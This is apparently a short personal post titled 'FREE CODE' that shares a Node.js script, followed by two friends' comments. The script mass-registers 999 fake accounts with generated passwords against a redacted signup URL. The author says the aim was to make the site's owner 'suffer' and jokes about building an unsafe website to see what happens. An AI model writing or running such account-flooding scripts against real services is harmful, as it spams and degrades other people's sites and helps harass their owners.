FREE CODE!!!11!!
const { faker } = require('@faker-js/faker');
const NUM_ACCOUNTS = 999;
async function registerFakeAccount(i) {
const username = "weenie" + i;
const password = faker.internet.password();
const response = await fetch('################', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ username, password })
});
const data = await response.json();
if (response.ok) {
console.log(`✅ Registered: ${username} / ${password}`);
} else {
console.log(`❌ Failed to register ${username}: ${data.error || response.statusText}`);
}
}
(async () => {
for (let i = 0; i < NUM_ACCOUNTS; i++) {
await registerFakeAccount(i);
}
})();

I'm not getting into skid activities, I wanted to see him suffer :3
istg I must make a website that it's the most unsafe thing ever and give access of it to the world and see what happens
Comments
Displaying 2 of 2 comments ( View all | Add Comment )
bonki
i still hate you for this
love you
by AdrianoTech; ; Report
cbladeOfficial
not weenie the jr :sob: